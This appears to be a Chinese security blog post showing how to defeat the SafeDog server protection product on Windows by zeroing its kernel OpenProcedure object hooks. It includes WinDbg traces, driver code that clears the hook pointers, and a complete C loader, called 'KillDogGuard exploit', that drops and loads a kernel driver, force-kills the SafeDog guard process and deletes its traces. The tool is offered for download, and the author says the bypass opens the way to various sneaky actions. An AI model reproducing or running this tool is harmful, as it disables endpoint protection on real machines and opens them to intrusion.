前言

文本探讨如果在r0 层恢复某狗的驱动,从而去掉其各种限制.当然r3 层也是有很多猥琐方法,本文暂先不表.
首先用 PCHunter 查看驱动SafeDogFileGuard.sys

1
2
3
4
5
6
[PC Hunter Standard][ObjectType Hook]: 15
函数名                当前函数地址  Hook            原地址   Object类型                   地址                当前函数地址所在模块
.......
OpenProcedure         0xB145E79A  object hook         -           PsThreadType           0x8055A35C        C:\WINDOWS\system32\DRIVERS\SafeDogFileGuard.sys
OpenProcedure         0xB145E5CE  object hook         -           PsProcessType  0x8055A358        C:\WINDOWS\system32\DRIVERS\SafeDogFileGuard.sys
......

两个 object hook

windbg 调试

某狗hook 了OpenProcedure
先来用windbg调试之

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
kd> dd PsProcessType     //获取 PsProcessType 地址  
8055a358  89e34e38 89e34c68 e10017e8 00000002
8055a368  00000003 00000000 00000000 00000000
8055a378  00000000 00000000 e18ee2ff e1754857
8055a388  e16bba07 00000000 00000000 00000000
8055a398  00000000 00000000 e19022c7 e209cc27
8055a3a8  00000000 00000000 00000000 00000000
8055a3b8  00000000 00000000 00000002 00000000
8055a3c8  00000000 00000000 00000000 00000000
kd> dt  89e34e38 _object_type  //查看 _object_type 结构体 找到  _OBJECT_TYPE_INITIALIZER 结构偏移
ntdll!_OBJECT_TYPE
   +0x000 Mutex            : _ERESOURCE
   +0x038 TypeList         : _LIST_ENTRY [ 0x89e34e70 - 0x89e34e70 ]
   +0x040 Name             : _UNICODE_STRING "Process"
   +0x048 DefaultObject    : (null)
   +0x04c Index            : 5
   +0x050 TotalNumberOfObjects : 0x1a
   +0x054 TotalNumberOfHandles : 0x63
   +0x058 HighWaterNumberOfObjects : 0x1c
   +0x05c HighWaterNumberOfHandles : 0x71
   +0x060 TypeInfo         : _OBJECT_TYPE_INITIALIZER
   +0x0ac Key              : 0x636f7250
   +0x0b0 ObjectLocks      : [4] _ERESOURCE
kd>  dt  89e34e38+0x060  _OBJECT_TYPE_INITIALIZER
ntdll!_OBJECT_TYPE_INITIALIZER
   +0x000 Length           : 0x4c
   +0x002 UseDefaultObject : 0 ''
   +0x003 CaseInsensitive  : 0 ''
   +0x004 InvalidAttributes : 0xb0
   +0x008 GenericMapping   : _GENERIC_MAPPING
   +0x018 ValidAccessMask  : 0x1f0fff
   +0x01c SecurityRequired : 0x1 ''
   +0x01d MaintainHandleCount : 0 ''
   +0x01e MaintainTypeList : 0 ''
   +0x020 PoolType         : 0 ( NonPagedPool )
   +0x024 DefaultPagedPoolCharge : 0x1000
   +0x028 DefaultNonPagedPoolCharge : 0x290
   +0x02c DumpProcedure    : (null)
   +0x030 OpenProcedure    : 0xb137a5ce     long  +0
   +0x034 CloseProcedure   : (null)
   +0x038 DeleteProcedure  : 0x805c77e2     void  nt!PspProcessDelete+0
   +0x03c ParseProcedure   : (null)
   +0x040 SecurityProcedure : 0x805edcf6     long  nt!SeDefaultObjectMethod+0
   +0x044 QueryNameProcedure : (null)
   +0x048 OkayToCloseProcedure : (null)
kd> u 0xb137a5ce  //汇编0xb137a5ce  
SafeDogFileGuard+0x85ce:
b137a5ce 8bff            mov     edi,edi
b137a5d0 55              push    ebp
b137a5d1 8bec            mov     ebp,esp
b137a5d3 8b450c          mov     eax,dword ptr [ebp+0Ch]
b137a5d6 83ec0c          sub     esp,0Ch
b137a5d9 56              push    esi
b137a5da 33f6            xor     esi,esi
b137a5dc 57              push    edi
kd> dt _OBJECT_TYPE_INITIALIZER poi(PsThreadType)+0x60  //根据上面结果一步到位
ntdll!_OBJECT_TYPE_INITIALIZER
   +0x000 Length           : 0x4c
   +0x002 UseDefaultObject : 0 ''
   +0x003 CaseInsensitive  : 0 ''
   +0x004 InvalidAttributes : 0xb0
   +0x008 GenericMapping   : _GENERIC_MAPPING
   +0x018 ValidAccessMask  : 0x1f03ff
   +0x01c SecurityRequired : 0x1 ''
   +0x01d MaintainHandleCount : 0 ''
   +0x01e MaintainTypeList : 0 ''
   +0x020 PoolType         : 0 ( NonPagedPool )
   +0x024 DefaultPagedPoolCharge : 0
   +0x028 DefaultNonPagedPoolCharge : 0x288
   +0x02c DumpProcedure    : (null)
   +0x030 OpenProcedure    : 0xb137a79a     long  +0
   +0x034 CloseProcedure   : (null)
   +0x038 DeleteProcedure  : 0x805c796a     void  nt!PspThreadDelete+0
   +0x03c ParseProcedure   : (null)
   +0x040 SecurityProcedure : 0x805edcf6     long  nt!SeDefaultObjectMethod+0
   +0x044 QueryNameProcedure : (null)
   +0x048 OkayToCloseProcedure : (null)
kd> u 0xb137a79a
SafeDogFileGuard+0x879a:
b137a79a 8bff            mov     edi,edi
b137a79c 55              push    ebp
b137a79d 8bec            mov     ebp,esp
b137a79f 83ec30          sub     esp,30h
b137a7a2 53              push    ebx
b137a7a3 56              push    esi
b137a7a4 57              push    edi
b137a7a5 ff7510          push    dword ptr [ebp+10h]

代码恢复 object hook

根据2 调试结果
驱动入口中写入

1
2
3
4
5
6
ULONG uProcssAddr=(ULONG)(*PsProcessType)+0x60+0x30; //获取  OpenProcdure [PsProcessType] 指针
  KdPrint(("[+] OpenProcdure [PsProcessType]  0x%08x\n",uProcssAddr));
  *(PULONG)uProcssAddr = 0x00000000; // OpenProcdure [PsProcessType] 指针清零
  ULONG uThreadAddr=(ULONG)(*PsThreadType)+0x60+0x30;
  KdPrint(("[+] OpenProcdure [PsThreadType]  0x%08x\n",uThreadAddr));
  *(PULONG)uThreadAddr = 0x00000000; // OpenProcdure [PsThreadType] 指针清零

windbg 调试日志

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
[+] -------------------- DriverEntry  -----------------
Break instruction exception - code 80000003 (first chance)
HelloDrive!DriverEntry+0xaf:
bac7922f cc              int     3
kd> p
HelloDrive!DriverEntry+0xb0:
bac79230 8b0d18a0c7ba    mov     ecx,dword ptr [HelloDrive!PsProcessType (bac7a018)]
kd> p
HelloDrive!DriverEntry+0xc1:
bac79241 8b45fc          mov     eax,dword ptr [ebp-4]
kd> p
[+] OpenProcdure [PsProcessType]  0x89e34ec8
HelloDrive!DriverEntry+0xd2:
bac79252 8b4dfc          mov     ecx,dword ptr [ebp-4]
kd> p
HelloDrive!DriverEntry+0xdb:
bac7925b 8b1514a0c7ba    mov     edx,dword ptr [HelloDrive!PsThreadType (bac7a014)]
kd> p
HelloDrive!DriverEntry+0xeb:
bac7926b 8b4df8          mov     ecx,dword ptr [ebp-8]
kd> p
[+] OpenProcdure [PsThreadType]  0x89e34cf8
HelloDrive!DriverEntry+0xfc:
bac7927c 8b55f8          mov     edx,dword ptr [ebp-8]
kd> p
HelloDrive!DriverEntry+0x105:
bac79285 33c0            xor     eax,eax
kd> dd  poi(PsProcessType)+0x60+0x30 l1
89e34ec8  00000000
kd> dd  poi(PsThreadType)+0x60+0x30 l1
89e34cf8  00000000
kd> g
[+] -------------------- Driver Unload -----------------

指针已经的值为 00000000 说明hook 已经废了
现在就可以干一系列的猥琐事了
比如

1
2
3
4
5
6
7
8
9
10
C:\Documents and Settings\Administrator>taskkill /im SafeDogGuardCenter.exe /f
成功: 已终止进程 "SafeDogGuardCenter.exe",其 PID 为 1156。

C:\Documents and Settings\Administrator>net  user

\\FUCKAV-A5A6BAA4 的用户帐
-------------------------------------------------------------------------------
Administrator            Guest                    HelpAssistant
SUPPORT_388945a0         test
命令成功完成。

KillDogGuard 编写

为了方便 写成单个文件 其执行过程为

1
运行 KillDogGuard.exe -> 释放 KillDogGuard.sys -> 加载驱动 启动-> unhook OpenProcdure  ->结束守护进程 ->卸载驱动 删除文件

vc 6.0 代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
#include "stdafx.h"
#include "resource.h"
#include  <STDIO.H>
#include <WINDOWS.H>
#define  DRIVE "KillDogGuard.sys"

void msg(char* strMsg,int type=0){

        char*  strDef="[*]";
        if(type)  strDef = (type == 1 )  ?  "[+]" : "[-]";
        printf("%s%s\r\n",strDef,strMsg);

}

BOOL LoadDriver(char* lpszDriverName,char* lpszDriverImagePath)
{
BOOL bRet=FALSE;
        SC_HANDLE hSeriverMgr=NULL;
        SC_HANDLE hSeriverDDK=NULL;
        //打开SCM控制管理器
        hSeriverMgr=OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
        if(hSeriverMgr==NULL)
        {

                bRet=FALSE;
                goto BeforeLeave;
        }
        else
        {

        }
        //创建驱动对应的服务
        hSeriverDDK=CreateService(
                                  hSeriverMgr,//服务管理器句柄
                          lpszDriverName,//驱动文件的注册表名
                                  lpszDriverName,//注册表显示文件名
                                  SERVICE_ALL_ACCESS,//加载驱动程序的访问权限
                                  SERVICE_KERNEL_DRIVER,//表示加载的服务是驱动程序
                                  SERVICE_DEMAND_START,//注册表驱动程序的start值
                                  SERVICE_ERROR_IGNORE,//注册表驱动程序的ErrorControl的值
                                  lpszDriverImagePath,//注册表驱动程序的ImagePath的路径
                                  NULL,
                                  NULL,
                                  NULL,
                                  NULL,
                                  NULL

                );
        DWORD dwRtn;
        if(hSeriverDDK==NULL)
        {
                dwRtn=GetLastError();
                if(dwRtn!=ERROR_IO_PENDING &amp;&amp; dwRtn!=ERROR_SERVICE_EXISTS)
                {

                        bRet=FALSE;
                        goto BeforeLeave;
                }
                else
                {

                }
                //服务已经创建过了,只需要打开即可
                hSeriverDDK=OpenService(hSeriverMgr,lpszDriverName,SERVICE_ALL_ACCESS);
                if(hSeriverDDK==NULL)
                {

                        dwRtn=GetLastError();

                        bRet=FALSE;
                        goto BeforeLeave;
                }
                else
                {

                }

        }            //曾经因为某种原因创建过,现在打开结束了
        else//这里是刚创建的,现在打开
        {

        }
        //开启此服务
        bRet=StartService(hSeriverDDK,NULL,NULL);
        if(!bRet)//若不成功
        {
                DWORD dwRtn=GetLastError();
                if(dwRtn!=ERROR_IO_PENDING &amp;&amp; dwRtn!=ERROR_SERVICE_ALREADY_RUNNING)
                {

                        bRet=FALSE;
                        goto BeforeLeave;
                }
                else
                {
                        if(dwRtn==ERROR_IO_PENDING)
                        {

                        bRet=FALSE;
                        goto BeforeLeave;
                        }
                        else
                        {

                                bRet=TRUE;
                                goto BeforeLeave;
                        }
                }
        }

bRet=TRUE;

BeforeLeave:
if(hSeriverDDK)
        {
                CloseServiceHandle(hSeriverDDK);
        }
if(hSeriverMgr)
        {
                CloseServiceHandle(hSeriverMgr);
        }
        return bRet;

}

BOOL UnLoadNTDriver(char* lpszSerName)
{
        BOOL bRet;
    bRet=FALSE;
        SC_HANDLE hSeriverMgr=NULL;
        SC_HANDLE hSeriverDDK=NULL;
        SERVICE_STATUS Svrsta;

        //打开SCM管理器
        hSeriverMgr=OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
        if(hSeriverMgr==NULL)
        {

                bRet=FALSE;
                goto BeforeLeave;
        }
        else
        {

        }
        //打开对应的服务
        hSeriverDDK=OpenService(hSeriverMgr,lpszSerName,SERVICE_ALL_ACCESS);
        if(hSeriverDDK==NULL)
        {

                bRet=FALSE;
                goto BeforeLeave;
        }
        else
        {

        }
        //停止服务程序,如果停止失败,只有重新启动才能动态加载
        if(!ControlService(hSeriverDDK,SERVICE_CONTROL_STOP,&amp;Svrsta))
        {

        }
        else
        {

        }
        //动态卸载驱动程序
        if(!DeleteService(hSeriverDDK))
        {

        }
        else
        {

        }
        bRet=TRUE;
BeforeLeave:
        if(hSeriverDDK)
        {
                CloseServiceHandle(hSeriverDDK);
        }
        if(hSeriverMgr)
        {
                CloseServiceHandle(hSeriverMgr);
        }
        return bRet;
}

int main(int argc, char* argv[])
{

        msg("KillDogGuard exploit By Yaseng");
        HGLOBAL hRes;
        HRSRC   hResInfo;
        DWORD   dwFileSize;
        BYTE*   lpDataBuffer;
        hResInfo=FindResource(NULL,MAKEINTRESOURCE(IDR_SYS1),"SYS");
        if (hResInfo==NULL)
        {
                msg("FindResource KillDogGuard.sys failed",-1);
                return false;
        }

        hRes=LoadResource(NULL,hResInfo);
        if (hRes==NULL)
        {
                msg("LoadResource KillDogGuard.sys failed",-1);
                return FALSE;
        }

        dwFileSize=SizeofResource(NULL,hResInfo);
        HANDLE  hFile = CreateFile("KillDogGuard.sys", GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);  
    if ( hFile == INVALID_HANDLE_VALUE )   
        {   
                msg("CreateFile KillDogGuard.sys failed",-1);
            return false;   
    }  
        DWORD   dwWrite=0;
    WriteFile(hFile,hRes,dwFileSize,&amp;dwWrite,NULL);      
        if (dwWrite < 0)
        {
                return false;
        }
        msg("Release KillDogGuard.sys succeed ",1);
    CloseHandle( hFile );

   char pBuf[MAX_PATH];                                            
   GetCurrentDirectory(MAX_PATH,pBuf);   
   strcat(pBuf,"\\KillDogGuard.sys");

        if(LoadDriver(DRIVE,pBuf)){

      msg("InstallDrive  KillDogGuard.sys succeed ",1);

        }else{

      msg("InstallDrive  KillDogGuard.sys failed ",-1);
          DeleteFile(pBuf);
      return false;

        }
    //do something

        system("taskkill /im SafeDogGuardCenter.exe /f");

    UnLoadNTDriver(DRIVE);
    DeleteFile(pBuf);
    msg("KillDogGuard exploit succeed -_- good luck !!!",1);
        return 0;
}

高清无码图

代码下载

KillDogGuard

参考资料

object hook :http://bbs.pediy.com/showthread.php?t=128161